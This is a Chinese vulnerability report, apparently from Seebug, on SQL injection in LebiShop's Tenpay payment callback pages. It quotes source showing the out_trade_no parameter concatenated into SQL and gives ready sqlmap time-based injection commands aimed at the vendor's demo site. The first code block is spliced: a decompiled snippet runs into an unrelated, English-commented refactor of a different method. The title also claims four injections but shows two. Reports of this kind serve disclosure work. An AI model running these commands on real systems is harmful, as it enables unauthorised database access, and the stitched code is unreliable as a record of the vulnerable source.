### 简要描述:
LebiShop商城系统最新版SQL注入二 四处 官方demo演示
### 详细说明:
注入一
```
http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx
```
源码如下
```
protected void Page_Load(object sender, EventArgs e)
{
string where = base.Request["out_trade_no"]; //没处理
Lebi_Order model = B_Lebi_Order.GetModel(where); //跟进
if (model == null)
{
base.Response.Write("系统错误");
base.Response.End();
}
else
{
TenpayUtil util = new TenpayUtil(model);
ResponseHandler handler = new ResponseHandler(this.Context);
....
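/// <summary>
/// Loads the first <c>Lebi_Order_Log</c> row that matches the given predicate.
/// </summary>
/// <param name="strWhere">
/// Either a SQLPara expression (contains <c>lbsql{</c>), which is delegated to the
/// <c>GetModel(SQLPara)</c> overload, or a raw SQL <c>WHERE</c> fragment that is
/// concatenated verbatim into the statement text.
/// SECURITY: the raw-fragment path is an unparameterized SQL sink. Callers must never
/// pass request-controlled data into this overload (the payment-callback pages that
/// forward <c>out_trade_no</c> here are the reported injection points); build the
/// predicate through SQLPara / bound parameters and pass only server-side literal
/// predicates to this string overload.
/// </param>
/// <returns>
/// The populated log entry, or <c>null</c> when the predicate is null/empty or no row matches.
/// </returns>
public Lebi_Order_Log GetModel(string strWhere)
{
    // A missing request parameter arrives as null: the previous code dereferenced it
    // (NullReferenceException) and an empty string produced a malformed "where" clause.
    // Both now map to "no such row", which every caller already handles via a null check.
    if (string.IsNullOrEmpty(strWhere))
    {
        return null;
    }

    // Ordinal: this is a literal token match, not a linguistic search.
    // NOTE(review): "> 0" means a string that *starts* with "lbsql{" (index 0) falls through
    // to the raw-concatenation path; ">= 0" is probably what was intended — confirm against SQLPara.
    if (strWhere.IndexOf("lbsql{", StringComparison.Ordinal) > 0)
    {
        SQLPara para = new SQLPara(strWhere, "", "");
        return this.GetModel(para);
    }

    // Unparameterized: strWhere becomes part of the statement text. This cannot be made safe
    // inside this method because its contract is "raw predicate"; the fix belongs at the callers
    // (see the <param> remarks).
    StringBuilder builder = new StringBuilder();
    builder.Append("select top 1 * from [Lebi_Order_Log] ");
    builder.Append(" where " + strWhere);

    // DataSet is IDisposable; the previous code never released it.
    using (DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString()))
    {
        if (set.Tables[0].Rows.Count <= 0)
        {
            return null;
        }

        DataRow row = set.Tables[0].Rows[0];
        Lebi_Order_Log log = new Lebi_Order_Log();

        // Empty cells (including DBNull, whose ToString() is "") leave the entity's default in place,
        // matching the original per-column guards.
        int? id = ReadNullableInt(row, "id");
        if (id.HasValue)
        {
            log.id = id.Value;
        }

        int? orderId = ReadNullableInt(row, "Order_id");
        if (orderId.HasValue)
        {
            log.Order_id = orderId.Value;
        }

        int? userId = ReadNullableInt(row, "User_id");
        if (userId.HasValue)
        {
            log.User_id = userId.Value;
        }

        int? adminId = ReadNullableInt(row, "Admin_id");
        if (adminId.HasValue)
        {
            log.Admin_id = adminId.Value;
        }

        log.Admin_Name = row["Admin_Name"].ToString();
        log.Content = row["Content"].ToString();

        string timeAddText = row["Time_Add"].ToString();
        if (timeAddText != "")
        {
            log.Time_Add = DateTime.Parse(timeAddText);
        }

        return log;
    }
}

/// <summary>
/// Reads an integer column, returning <c>null</c> for an empty cell.
/// Parsing stays strict (<c>int.Parse</c>) so corrupt data surfaces as an exception
/// rather than a silent zero, exactly as before.
/// </summary>
/// <param name="row">The result row to read from.</param>
/// <param name="column">The column name.</param>
/// <returns>The parsed value, or <c>null</c> when the cell's text is empty.</returns>
private static int? ReadNullableInt(DataRow row, string column)
{
    string text = row[column].ToString();
    if (text == "")
    {
        return null;
    }
    return int.Parse(text);
}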
```
注入二
```
http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx
```
```
protected void Page_Load(object sender, EventArgs e)
{
string where = base.Request["out_trade_no"]; //没处理
Lebi_Order model = B_Lebi_Order.GetModel(where);//跟进
if (model == null)
{
base.Response.Write("系统错误");
base.Response.End();
}
else
{
TenpayUtil util = new TenpayUtil(model);
ResponseHandler handler = new ResponseHandler(this.Context);
handler.setKey(util.tenpay_key);
if (handler.isTenpaySign())
```
```
public Lebi_Order GetModel(string strWhere)
{
if (strWhere.IndexOf("lbsql{") > 0)
{
SQLPara para = new SQLPara(strWhere, "", "");
return this.GetModel(para);
}
StringBuilder builder = new StringBuilder();
builder.Append("select top 1 * from [Lebi_Order] ");
builder.Append(" where " + strWhere); //存在注入了
Lebi_Order order = new Lebi_Order();
DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
if (set.Tables[0].Rows.Count <= 0)
```
### 漏洞证明:
注入一
sqlmap扫描
```
sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10
```
[<img src="https://images.seebug.org/upload/201503/02233221883586af737cd98d79a3a571ccd1801f.png" alt="555.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/02233221883586af737cd98d79a3a571ccd1801f.png)
[<img src="https://images.seebug.org/upload/201503/02233647b498072f8acd3f487806bfe801cfaf06.png" alt="556.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/02233647b498072f8acd3f487806bfe801cfaf06.png)
第二处注入
sqlmap扫描
```
sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10
```
[<img src="https://images.seebug.org/upload/201503/0223393231ed5665fbf4b7d234614ed5e53e346e.png" alt="557.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0223393231ed5665fbf4b7d234614ed5e53e346e.png)
[<img src="https://images.seebug.org/upload/201503/02234537dc3401173c8b6d6d0affd6eadd0aa0c1.png" alt="558.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/02234537dc3401173c8b6d6d0affd6eadd0aa0c1.png)